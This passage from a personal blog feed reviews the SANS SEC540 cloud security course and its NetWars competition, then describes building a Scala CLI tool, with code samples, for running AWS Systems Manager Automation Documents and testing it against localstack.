&lt;a href="https://www.sans.org/event/prague-march-2020" target="_blank" rel="noopener">SANS Prague&lt;/a> in March 2020.&lt;/p>
&lt;h2 id="pre-course">Pre-Course&lt;/h2>
&lt;p>About a week before the course was set to begin, I received the Course Booklets via UPS delivery. It was a bit surprising that they did not send an email with the tracking ID, so I was caught off-guard when I was told I needed to pick it up in a nearby UPS affiliate shop. Nevertheless, it was quite fast and efficient, so there were no issues there.&lt;/p>
&lt;p>Since this was a &lt;strong>LiveOnline&lt;/strong> course, I needed to download a few things from my SANS account in advance, that normally would be distributed on USB sticks at the start of an in-person course. Luckily they send numerous email reminders about this, and there are also great instructions available online, such as
&lt;a href="https://sansorg.egnyte.com/dl/wO5QUU3BK5/Power_Computing_-_Generic_Laptop_Requirements_Checklist_v2.0.docx_" target="_blank" rel="noopener">THIS&lt;/a> document.&lt;/p>
&lt;p>The most important item to download was of course the course VM for the Lab Exercises. For this course, it was a 9 GB iso file which had the compressed VMWare virtual machine image in it. This VM required quite substantial resources, so I felt lucky to have a work laptop that has 32 GB RAM with an 8 core Intel i9 CPU and 1 TB of SSD storage. The RAM was especially critical for the VM, it needed at least 12 GB, but I gave it 16 just to be sure. For students whose machine was no powerful enough they had an AMI image in AWS with a Cloudformation template to set it up quickly.&lt;/p>
&lt;p>In addition, we needed to download and set up Slack for chat support during the course and GoToTraining for the actual streaming of the course content. I found that for whatever reason the GoToTraining session was spiking my laptop&amp;rsquo;s CPU usage to a point that it was almost overheating, so I decided to use my Table for the course streaming, which worked quite well.&lt;/p>
&lt;p>Last but not least, I also downloaded the course booklets in pdf format, however they were heavily protected with watermarks and a complex password. Copy-pasting was also disabled. It would have been nice if I could open the pdfs on my tablet and use my pencil to write on it, but since I also had the printed booklets this was a minor annoyance.&lt;/p>
&lt;h2 id="course-content">Course Content&lt;/h2>
&lt;p>The first day started with an introduction to the principles of DevOps and how Security can be integrated into CI/CD pipelines. In between the topics, we were getting familiar with the student VM which is home to the Lab Exercises. I have to admit that at first I was quite overwhelmed by the complex setup that&amp;rsquo;s shipped in this single VM image. There were a surprising number of services running in docker containers behind the scenes, such as Jenkins, GitLab and Hashicorp Vault.&lt;/p>
&lt;p>As part of the day 1 labs we practiced the deployment of a web service using
&lt;a href="https://www.jenkins.io/" target="_blank" rel="noopener">Jenkins&lt;/a>. We also implemented improved security via pre-commit scanning and Security Analysis (SAST/DAST) as part of the CI/CD pipeline. The next day we set up the environment that paved our journey to the cloud (AWS) relying on concepts such as Infrastructure-as-Code (
&lt;a href="https://aws.amazon.com/cloudformation/" target="_blank" rel="noopener">Cloudformation&lt;/a>) and Configuration Management (
&lt;a href="https://puppet.com/" target="_blank" rel="noopener">Puppet&lt;/a>). On day 3 we embarked on a journey to harden our cloud infrastructure with tools that can do Security Scanning and Continuous Monitoring and Alerting (
&lt;a href="https://grafana.com/" target="_blank" rel="noopener">Grafana&lt;/a> &amp;amp;
&lt;a href="https://aws.amazon.com/cloudwatch/" target="_blank" rel="noopener">CloudWatch&lt;/a>). We also looked into secrets management best practices on-premise and in the cloud via
&lt;a href="https://www.vaultproject.io/" target="_blank" rel="noopener">Hashicorp Vault&lt;/a>. On day 4 we fixed some vulnerabilities in our web service using a blue/green deployment setup to minimize downtime. We also looked into protecting microservice APIs using serverless functions that aim to manage authorization and access control. On the final day we looked into certain concepts related to compliance in cloud environments and explored technologies such as
&lt;a href="https://aws.amazon.com/waf/" target="_blank" rel="noopener">AWS WAF&lt;/a>,
&lt;a href="https://duo.com/blog/introducing-cloudmapper-an-aws-visualization-tool" target="_blank" rel="noopener">CloudMapper&lt;/a> and
&lt;a href="https://cloudcustodian.io/" target="_blank" rel="noopener">Cloud Custodian&lt;/a>.&lt;/p>
&lt;p>I have to admit that the lab environment that&amp;rsquo;s set up in the Student VM was pretty impressive to me. There were so many moving parts to it, yet everything worked more or less seamlessly. The built-in Wiki always provided detailed instructions with copy-paste support to allow you to work through each lab even if you were unfamiliar with the technology. If you were stuck you could get help very quickly from the Teaching Assistant, or the Instructor as well. Overall they did an excellent job over the 5 days of the course.&lt;/p>
&lt;h2 id="netwars">NetWars&lt;/h2>
&lt;p>This post would not be complete without mention of the NetWars arena which I was very keen to take part in. During &lt;strong>#SEC530&lt;/strong> in March 2020, the NetWars arena was open only on Day 6 when we competed against each other in teams. Thanks to this course, I was invited to several free NetWars events afterwards, such as
&lt;a href="https://www.sans.org/cyber-ranges/netwars-tournaments/core/" target="_blank" rel="noopener">Core NetWars&lt;/a> and the Mini NetWars Missions 1-2-3-4.&lt;/p>
&lt;p>I am quite certain that these free NetWars sessions helped me immensely to hone my CTF skillz, that would come in handy during &lt;strong>#SEC540&lt;/strong> where I had 4 full days to compete. I jumped to the front of the leader board already after the first night, as I stayed up until 3 am working on the NetWars questions. This was a bit reckless as I was a bit tired the day after, so my focus on the course material was not the best, but a few rounds of coffee helped with that.&lt;/p>
&lt;p>&lt;img src="scoreboard.png" alt="SEC540-NetWars-Scoreboard">&lt;/p>
&lt;p>In the end I managed to keep my position on the top of the leaderboard which made me feel really proud as I&amp;rsquo;ve worked really long and hard during the whole week. I even managed to solve some of the more advanced &lt;code>1337&lt;/code> challenges that had no hints, just a description of what was required and we were free to improvise the solution.&lt;/p>
&lt;p>Two months later my 2nd NetWars coin has finally arrived by post 🤩&lt;/p>
&lt;p>&lt;img src="coin.jpg" alt="SEC540-NetWars-Coin">&lt;/p>
&lt;h2 id="conclusions">Conclusions&lt;/h2>
&lt;p>Initially I was quite hesitant about attending &lt;strong>SEC540&lt;/strong> in the &lt;strong>LiveOnline&lt;/strong> format as I was not sure if it would work well. In the end I was left with only positive feelings about it. The course content was excellent. The delivery was smooth and help was always available through the Slack channel. If someone wants to learn about DevOps, Cloud and Security, I highly recommend this SANS course!&lt;/p>
&lt;h3 id="ps">P.S.&lt;/h3>
&lt;p>On the 1st of February, 2.5 months after my class I successfully passed the GIAC exam and became GCSA certified! 🎉&lt;/p></description></item><item><title>My first scala app</title><link>https://flrnks.netlify.app/post/aws-scala-tools/</link><pubDate>Sat, 10 Oct 2020 11:11:00 +0000</pubDate><guid>https://flrnks.netlify.app/post/aws-scala-tools/</guid><description>&lt;h2 id="motivation">Motivation&lt;/h2>
&lt;p>In this post I wanted to write about a personal project I started some time ago, with the goal of learning more about Scala. At work, we use Scala quite often to run big data jobs on AWS using Apache Spark. I&amp;rsquo;ve never used Scala before I joined my current team, and its syntax was very alien to me. However, recently I had the chance to work on a task, where I had to modify a component to use AWS Secrets Manager instead of HashiCorp&amp;rsquo;s Vault for fetching some secret value at runtime. To my surprise I could complete this work without much struggle with Scala, and afterwards I became eager to learn more. Based on a colleague&amp;rsquo;s recommendation I started reading a book from Cay S. Horstmann titled &lt;strong>Scala for the impatient (2nd edition)&lt;/strong>. I&amp;rsquo;m making slow but steady progress.&lt;/p>
&lt;p>
&lt;a href="https://learning.oreilly.com/library/view/scala-for-the/9780134540627/" target="_blank" rel="noopener">&lt;img src="images/scalabook.jpg" alt="Scala-For-The-Impatient">&lt;/a>&lt;/p>
&lt;p>Shortly after starting with the book, I had the idea to start a small project so that I can practice Scala by doing.&lt;/p>
&lt;h2 id="the-idea">The Idea&lt;/h2>
&lt;p>The idea, like many others before, came while fixing a bug at work. The bug was found within a component written in Scala to interact with the AWS Athena service. It had some neatly written functionality for making queries and waiting for their completion before trying to fetch the results. I thought I would try to write something similar for AWS Systems Manager (SSM). It is a service with few different components, so I decided to focus on &lt;code>Automation Documents&lt;/code> that can carry out actions in an automated fashion. For example, the AWS provided SSM document &lt;code>AWS-StartEC2Instance&lt;/code> can run any EC2 instance when invoked with the below 2 input parameters:&lt;/p>
&lt;ul>
&lt;li>&lt;strong>InstanceId&lt;/strong>: to specify which EC2 instance you want to start&lt;/li>
&lt;li>&lt;strong>AutomationAssumeRole&lt;/strong>: to specify an IAM role which can be assumed by SSM to carry out this action&lt;/li>
&lt;/ul>
&lt;p>I realized quite early on, that if I wanted to implement this capability in my Scala app, it needed to be quite generic, so that it could support any Automation Document with an arbitrary number of input parameters. I also wanted it to be able to wait for the execution and report whether it failed or succeeded. Here are the final requirements I came up with:&lt;/p>
&lt;ul>
&lt;li>create 2 separate git repos for:
&lt;ul>
&lt;li>a module that&amp;rsquo;s home for the AWS utility/helper classes&lt;/li>
&lt;li>a module for implementing the CLI App&lt;/li>
&lt;/ul>
&lt;/li>
&lt;li>support extra AWS services such as KMS, Secrets Manager and CloudFormation&lt;/li>
&lt;li>utilize
&lt;a href="https://github.com/localstack/localstack-java-utils" target="_blank" rel="noopener">localstack&lt;/a> for integration testing (when possible)&lt;/li>
&lt;/ul>
&lt;h2 id="initial-setup">Initial setup&lt;/h2>
&lt;p>Firstly, I had to figure out which third-party packages I needed to implement the app according to these simple requirements. To interact with AWS from Scala code, I decided to go with &lt;strong>v2&lt;/strong> of the official
&lt;a href="https://docs.aws.amazon.com/sdk-for-java/index.html" target="_blank" rel="noopener">Java SDK for AWS&lt;/a>. To implement the CLI app I mainly relied on the &lt;strong>picocli&lt;/strong> Java package, which was a bit less straightforward, but eventually it proved to be a good choice.&lt;/p>
&lt;p>Secondly, I have to admit that creating a re-usable scala package from scratch was a rather non-trivial task for me. Most of my programming experience comes from working with in non-JVM based environments so that&amp;rsquo;s probably no surprise. I initially started out with &lt;strong>sbt&lt;/strong> for build &amp;amp; dependency management, but I was running into issues that I couldn&amp;rsquo;t solve on my own, so I decided to swap it with &lt;strong>maven&lt;/strong> which was a bit more familiar to me.&lt;/p>
&lt;p>Finally, separating the project into two distinct git repositories allowed me to practice versioning and dependency management which I also found very useful:&lt;/p>
&lt;ul>
&lt;li>AWS Scala Utils: &lt;a href="https://github.com/florianakos/aws-utils-scala">https://github.com/florianakos/aws-utils-scala&lt;/a>&lt;/li>
&lt;li>AWS SSM CLI App: &lt;a href="https://github.com/florianakos/aws-ssm-scala-app">https://github.com/florianakos/aws-ssm-scala-app&lt;/a>&lt;/li>
&lt;/ul>
&lt;h2 id="the-utils-module">The utils module&lt;/h2>
&lt;p>Creating the utils module that would serve as a kind of glue between the scala CLI app and AWS Systems Manager was actually not as difficult as I thought. This is mostly thanks to the example I&amp;rsquo;ve seen at work for a similar project with the AWS Athena service.&lt;/p>
&lt;p>The core functionality of the utils module when it comes to SSM, is captured in the below functions:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-scala" data-lang="scala">&lt;span class="k">private&lt;/span> &lt;span class="k">def&lt;/span> &lt;span class="n">executeAutomation&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="n">documentName&lt;/span>&lt;span class="k">:&lt;/span> &lt;span class="kt">String&lt;/span>&lt;span class="o">,&lt;/span> &lt;span class="n">parameters&lt;/span>&lt;span class="k">:&lt;/span> &lt;span class="kt">java.util.Map&lt;/span>&lt;span class="o">[&lt;/span>&lt;span class="kt">String&lt;/span>,&lt;span class="kt">java.util.List&lt;/span>&lt;span class="o">[&lt;/span>&lt;span class="kt">String&lt;/span>&lt;span class="o">]])&lt;/span>&lt;span class="k">:&lt;/span> &lt;span class="kt">Future&lt;/span>&lt;span class="o">[&lt;/span>&lt;span class="kt">String&lt;/span>&lt;span class="o">]&lt;/span> &lt;span class="k">=&lt;/span> &lt;span class="o">{&lt;/span>
&lt;span class="k">val&lt;/span> &lt;span class="n">startAutomationRequest&lt;/span> &lt;span class="k">=&lt;/span> &lt;span class="nc">StartAutomationExecutionRequest&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">builder&lt;/span>&lt;span class="o">()&lt;/span>
&lt;span class="o">.&lt;/span>&lt;span class="n">documentName&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="n">documentName&lt;/span>&lt;span class="o">)&lt;/span>
&lt;span class="o">.&lt;/span>&lt;span class="n">parameters&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="n">parameters&lt;/span>&lt;span class="o">)&lt;/span>
&lt;span class="o">.&lt;/span>&lt;span class="n">build&lt;/span>&lt;span class="o">()&lt;/span>
&lt;span class="nc">Future&lt;/span> &lt;span class="o">{&lt;/span>
&lt;span class="k">val&lt;/span> &lt;span class="n">executionResponse&lt;/span> &lt;span class="k">=&lt;/span> &lt;span class="n">ssmClient&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">startAutomationExecution&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="n">startAutomationRequest&lt;/span>&lt;span class="o">)&lt;/span>
&lt;span class="n">logger&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">info&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="s">s&amp;#34;Execution id: &lt;/span>&lt;span class="si">${&lt;/span>&lt;span class="n">executionResponse&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">automationExecutionId&lt;/span>&lt;span class="o">()&lt;/span>&lt;span class="si">}&lt;/span>&lt;span class="s">&amp;#34;&lt;/span>&lt;span class="o">)&lt;/span>
&lt;span class="n">executionResponse&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">automationExecutionId&lt;/span>&lt;span class="o">()&lt;/span>
&lt;span class="o">}&lt;/span>
&lt;span class="o">}&lt;/span>
&lt;span class="k">private&lt;/span> &lt;span class="k">def&lt;/span> &lt;span class="n">waitForAutomationToFinish&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="n">executionId&lt;/span>&lt;span class="k">:&lt;/span> &lt;span class="kt">String&lt;/span>&lt;span class="o">)&lt;/span>&lt;span class="k">:&lt;/span> &lt;span class="kt">Future&lt;/span>&lt;span class="o">[&lt;/span>&lt;span class="kt">String&lt;/span>&lt;span class="o">]&lt;/span> &lt;span class="k">=&lt;/span> &lt;span class="o">{&lt;/span>
&lt;span class="k">val&lt;/span> &lt;span class="n">getExecutionRequest&lt;/span> &lt;span class="k">=&lt;/span> &lt;span class="nc">GetAutomationExecutionRequest&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">builder&lt;/span>&lt;span class="o">().&lt;/span>&lt;span class="n">automationExecutionId&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="n">executionId&lt;/span>&lt;span class="o">).&lt;/span>&lt;span class="n">build&lt;/span>&lt;span class="o">()&lt;/span>
&lt;span class="k">var&lt;/span> &lt;span class="n">status&lt;/span> &lt;span class="k">=&lt;/span> &lt;span class="nc">AutomationExecutionStatus&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="nc">IN_PROGRESS&lt;/span>
&lt;span class="nc">Future&lt;/span> &lt;span class="o">{&lt;/span>
&lt;span class="k">var&lt;/span> &lt;span class="n">retries&lt;/span> &lt;span class="k">=&lt;/span> &lt;span class="mi">0&lt;/span>
&lt;span class="k">while&lt;/span> &lt;span class="o">(&lt;/span>&lt;span class="n">status&lt;/span> &lt;span class="o">!=&lt;/span> &lt;span class="nc">AutomationExecutionStatus&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="nc">SUCCESS&lt;/span>&lt;span class="o">)&lt;/span> &lt;span class="o">{&lt;/span>
&lt;span class="k">val&lt;/span> &lt;span class="n">automationExecutionResponse&lt;/span> &lt;span class="k">=&lt;/span> &lt;span class="n">ssmClient&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">getAutomationExecution&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="n">getExecutionRequest&lt;/span>&lt;span class="o">)&lt;/span>
&lt;span class="n">status&lt;/span> &lt;span class="k">=&lt;/span> &lt;span class="n">automationExecutionResponse&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">automationExecution&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">automationExecutionStatus&lt;/span>&lt;span class="o">()&lt;/span>
&lt;span class="n">status&lt;/span> &lt;span class="k">match&lt;/span> &lt;span class="o">{&lt;/span>
&lt;span class="k">case&lt;/span> &lt;span class="nc">AutomationExecutionStatus&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="nc">CANCELLED&lt;/span> &lt;span class="o">|&lt;/span> &lt;span class="nc">AutomationExecutionStatus&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="nc">FAILED&lt;/span> &lt;span class="o">|&lt;/span> &lt;span class="nc">AutomationExecutionStatus&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="nc">TIMED_OUT&lt;/span> &lt;span class="k">=&amp;gt;&lt;/span>
&lt;span class="k">throw&lt;/span> &lt;span class="nc">SsmAutomationExecutionException&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="n">status&lt;/span>&lt;span class="o">,&lt;/span> &lt;span class="n">automationExecutionResponse&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">automationExecution&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">failureMessage&lt;/span>&lt;span class="o">)&lt;/span>
&lt;span class="k">case&lt;/span> &lt;span class="nc">AutomationExecutionStatus&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="nc">SUCCESS&lt;/span> &lt;span class="k">=&amp;gt;&lt;/span>
&lt;span class="n">logger&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">info&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="s">s&amp;#34;Query finished with status: &lt;/span>&lt;span class="si">$status&lt;/span>&lt;span class="s">&amp;#34;&lt;/span>&lt;span class="o">)&lt;/span>
&lt;span class="k">case&lt;/span> &lt;span class="n">status&lt;/span>&lt;span class="k">:&lt;/span> &lt;span class="kt">AutomationExecutionStatus&lt;/span> &lt;span class="o">=&amp;gt;&lt;/span>
&lt;span class="n">logger&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">info&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="s">s&amp;#34;SSM Automation execution status: &lt;/span>&lt;span class="si">$status&lt;/span>&lt;span class="s">, check #&lt;/span>&lt;span class="si">$retries&lt;/span>&lt;span class="s">.&amp;#34;&lt;/span>&lt;span class="o">)&lt;/span>
&lt;span class="nc">Thread&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">sleep&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="k">if&lt;/span> &lt;span class="o">(&lt;/span>&lt;span class="n">retries&lt;/span> &lt;span class="o">&amp;lt;=&lt;/span> &lt;span class="mi">3&lt;/span>&lt;span class="o">)&lt;/span> &lt;span class="mi">2500&lt;/span> &lt;span class="k">else&lt;/span> &lt;span class="k">if&lt;/span> &lt;span class="o">(&lt;/span>&lt;span class="n">retries&lt;/span> &lt;span class="o">&amp;lt;=&lt;/span> &lt;span class="mi">10&lt;/span>&lt;span class="o">)&lt;/span> &lt;span class="mi">5000&lt;/span> &lt;span class="k">else&lt;/span> &lt;span class="mi">15000&lt;/span>&lt;span class="o">)&lt;/span>
&lt;span class="o">}&lt;/span>
&lt;span class="n">retries&lt;/span> &lt;span class="o">+=&lt;/span> &lt;span class="mi">1&lt;/span>
&lt;span class="o">}&lt;/span>
&lt;span class="o">}.&lt;/span>&lt;span class="n">map&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="k">_&lt;/span> &lt;span class="k">=&amp;gt;&lt;/span> &lt;span class="n">executionId&lt;/span>&lt;span class="o">)&lt;/span>
&lt;span class="o">}&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>The first one &lt;code>executeAutomation&lt;/code> crafts an execution request and then submits it to AWS, returning its execution ID. This ID can be passed to the &lt;code>waitForAutomationToFinish&lt;/code> function that periodically checks in with AWS until the execution is complete. Between subsequent API requests it uses an increasing timeout to prevent API rate-limiting caused by excessive polling.&lt;/p>
&lt;h2 id="testing-the-utils-module">Testing the utils module&lt;/h2>
&lt;p>Once I had the core functionality ready I wanted to write integration tests to ensure it works as expected. Instead of having hard-coded AWS credentials or an AWS profile for a real account I wanted to use Localstack that mocks the real AWS API so that you can interact with it. For this reason I slightly tweaked the &lt;code>SsmAutomationHelper&lt;/code> class to accept an &lt;strong>Optional&lt;/strong> second argument which can be used while building the SSM API client:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-scala" data-lang="scala">&lt;span class="k">class&lt;/span> &lt;span class="nc">SsmAutomationHelper&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="n">profile&lt;/span>&lt;span class="k">:&lt;/span> &lt;span class="kt">String&lt;/span>&lt;span class="o">,&lt;/span> &lt;span class="n">apiEndpoint&lt;/span>&lt;span class="k">:&lt;/span> &lt;span class="kt">Option&lt;/span>&lt;span class="o">[&lt;/span>&lt;span class="kt">String&lt;/span>&lt;span class="o">])&lt;/span> &lt;span class="k">extends&lt;/span> &lt;span class="nc">LazyLogging&lt;/span> &lt;span class="o">{&lt;/span>
&lt;span class="k">private&lt;/span> &lt;span class="k">val&lt;/span> &lt;span class="n">ssmClient&lt;/span> &lt;span class="k">=&lt;/span> &lt;span class="n">apiEndpoint&lt;/span> &lt;span class="k">match&lt;/span> &lt;span class="o">{&lt;/span>
&lt;span class="k">case&lt;/span> &lt;span class="nc">None&lt;/span> &lt;span class="k">=&amp;gt;&lt;/span> &lt;span class="nc">SsmClient&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">builder&lt;/span>&lt;span class="o">()&lt;/span>
&lt;span class="o">.&lt;/span>&lt;span class="n">credentialsProvider&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="nc">ProfileCredentialsProvider&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">create&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="n">profile&lt;/span>&lt;span class="o">))&lt;/span>
&lt;span class="o">.&lt;/span>&lt;span class="n">region&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="nc">Region&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="nc">EU_WEST_1&lt;/span>&lt;span class="o">)&lt;/span>
&lt;span class="o">.&lt;/span>&lt;span class="n">build&lt;/span>&lt;span class="o">()&lt;/span>
&lt;span class="k">case&lt;/span> &lt;span class="nc">Some&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="n">localstackEndpoint&lt;/span>&lt;span class="o">)&lt;/span> &lt;span class="k">=&amp;gt;&lt;/span> &lt;span class="nc">SsmClient&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">builder&lt;/span>&lt;span class="o">()&lt;/span>
&lt;span class="o">.&lt;/span>&lt;span class="n">credentialsProvider&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="nc">StaticCredentialsProvider&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">create&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="nc">AwsBasicCredentials&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">create&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="s">&amp;#34;foo&amp;#34;&lt;/span>&lt;span class="o">,&lt;/span> &lt;span class="s">&amp;#34;bar&amp;#34;&lt;/span>&lt;span class="o">)))&lt;/span>
&lt;span class="o">.&lt;/span>&lt;span class="n">endpointOverride&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="nc">URI&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">create&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="n">localstackEndpoint&lt;/span>&lt;span class="o">))&lt;/span>
&lt;span class="o">.&lt;/span>&lt;span class="n">build&lt;/span>&lt;span class="o">()&lt;/span>
&lt;span class="o">}&lt;/span>
&lt;span class="o">}&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>This allowed me to pass &lt;code>http://localhost:4566&lt;/code> when running the integration tests against &lt;strong>localstack&lt;/strong> and have the API calls directed to those mocked endpoints. Previously each mocked service had its own dedicated port, but thanks to a recent change in &lt;strong>localstack&lt;/strong>, now all AWS services can be run on a single port, they call &lt;strong>EDGE&lt;/strong> port.&lt;/p>
&lt;p>According to the documentation, SSM is supported in &lt;strong>localstack&lt;/strong>, however I&amp;rsquo;ve found out that running Automation Documents is feature that is still missing. As a result, I had to run the integration tests against a real AWS account that I set up for such scenarios. I was okay with doing this since there are plenty of built-in Automation Documents provided by AWS that I could safely use for this purpose.&lt;/p>
&lt;p>Eventually I decided to encode in the tests &lt;code>AWS-StartEC2Instance &amp;amp; AWS-StopEC2Instance&lt;/code> which only required me to set up a dummy EC2 instance which would be the target of these requests. I also added a special &lt;strong>Tag&lt;/strong> to these integration tests so that they are excluded from running when invoked via &lt;code>mvn test&lt;/code> but still available to run manually whenever necessary.&lt;/p>
&lt;h2 id="cli-app-implementation">CLI App implementation&lt;/h2>
&lt;p>After running the tests, I was confident that the AWS utils worked correctly, so I started putting together the CLI app. For this, I&amp;rsquo;ve searched on the web for a third party package and found that it&amp;rsquo;s not as simple as it is when using Python&amp;rsquo;s &lt;code>argparse&lt;/code> package. I eventually settled with &lt;code>picocli&lt;/code>, which is written in Java but can also be used from Scala via the below annotations:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-scala" data-lang="scala">&lt;span class="nd">@Command&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="n">name&lt;/span> &lt;span class="k">=&lt;/span> &lt;span class="s">&amp;#34;SsmHelper&amp;#34;&lt;/span>&lt;span class="o">,&lt;/span> &lt;span class="n">version&lt;/span> &lt;span class="k">=&lt;/span> &lt;span class="nc">Array&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="s">&amp;#34;v0.0.1&amp;#34;&lt;/span>&lt;span class="o">),&lt;/span> &lt;span class="n">mixinStandardHelpOptions&lt;/span> &lt;span class="k">=&lt;/span> &lt;span class="kc">true&lt;/span>&lt;span class="o">,&lt;/span> &lt;span class="n">description&lt;/span> &lt;span class="k">=&lt;/span> &lt;span class="nc">Array&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="s">&amp;#34;CLI app for running automation documents in AWS SSM&amp;#34;&lt;/span>&lt;span class="o">))&lt;/span>
&lt;span class="k">class&lt;/span> &lt;span class="nc">SsmCliParser&lt;/span> &lt;span class="k">extends&lt;/span> &lt;span class="nc">Callable&lt;/span>&lt;span class="o">[&lt;/span>&lt;span class="kt">Unit&lt;/span>&lt;span class="o">]&lt;/span> &lt;span class="k">with&lt;/span> &lt;span class="nc">LazyLogging&lt;/span> &lt;span class="o">{&lt;/span>
&lt;span class="nd">@Option&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="n">names&lt;/span> &lt;span class="k">=&lt;/span> &lt;span class="nc">Array&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="s">&amp;#34;-D&amp;#34;&lt;/span>&lt;span class="o">,&lt;/span> &lt;span class="s">&amp;#34;--document&amp;#34;&lt;/span>&lt;span class="o">),&lt;/span> &lt;span class="n">description&lt;/span> &lt;span class="k">=&lt;/span> &lt;span class="nc">Array&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="s">&amp;#34;Name of the SSM Automation document to execute&amp;#34;&lt;/span>&lt;span class="o">))&lt;/span>
&lt;span class="k">private&lt;/span> &lt;span class="k">var&lt;/span> &lt;span class="n">documentName&lt;/span> &lt;span class="k">=&lt;/span> &lt;span class="k">new&lt;/span> &lt;span class="nc">String&lt;/span>
&lt;span class="nd">@Parameters&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="n">index&lt;/span> &lt;span class="k">=&lt;/span> &lt;span class="s">&amp;#34;0..*&amp;#34;&lt;/span>&lt;span class="o">,&lt;/span> &lt;span class="n">arity&lt;/span> &lt;span class="k">=&lt;/span> &lt;span class="s">&amp;#34;0..*&amp;#34;&lt;/span>&lt;span class="o">,&lt;/span> &lt;span class="n">paramLabel&lt;/span> &lt;span class="k">=&lt;/span> &lt;span class="s">&amp;#34;&amp;lt;param1=val1&amp;gt; &amp;lt;param2=val2&amp;gt; ...&amp;#34;&lt;/span>&lt;span class="o">,&lt;/span> &lt;span class="n">description&lt;/span> &lt;span class="k">=&lt;/span> &lt;span class="nc">Array&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="s">&amp;#34;Key=Value parameters to use as Input Params&amp;#34;&lt;/span>&lt;span class="o">))&lt;/span>
&lt;span class="k">private&lt;/span> &lt;span class="k">val&lt;/span> &lt;span class="n">parameters&lt;/span>&lt;span class="k">:&lt;/span> &lt;span class="kt">util.ArrayList&lt;/span>&lt;span class="o">[&lt;/span>&lt;span class="kt">String&lt;/span>&lt;span class="o">]&lt;/span> &lt;span class="k">=&lt;/span> &lt;span class="kc">null&lt;/span>
&lt;span class="o">[&lt;/span>&lt;span class="kt">...&lt;/span>&lt;span class="o">]&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>According to the original idea, there had to be one constant CLI flag which controlled the name of the AWS Automation Document (&lt;code>--document&lt;/code>) and then there had to be a variable number of additional arguments for specifying the Input Parameters required by the given document. The &lt;code>picocli&lt;/code> package supported this workflow via the &lt;strong>@Option&lt;/strong> and the &lt;strong>@Parameters&lt;/strong> annotations.&lt;/p>
&lt;p>The only thing left was a custom function that would carry out the needed transformation of Input Parameters. The values received in the &lt;code>parameters&lt;/code> were in the form of an &lt;strong>ArrayList&lt;/strong>: &lt;code>[&amp;lt;param1=val1&amp;gt;, &amp;lt;param2=val2&amp;gt;, ...]&lt;/code> which had to be transformed into a &lt;strong>Map&lt;/strong>: &lt;code>[param1 -&amp;gt; [val1], param2 -&amp;gt; [val2]]&lt;/code> by splitting each String on the &lt;strong>=&lt;/strong> character. The desired format was a requirement of the AWS SDK for SSM. After some iterations I ended up with the below function that could do this transformation:&lt;/p>
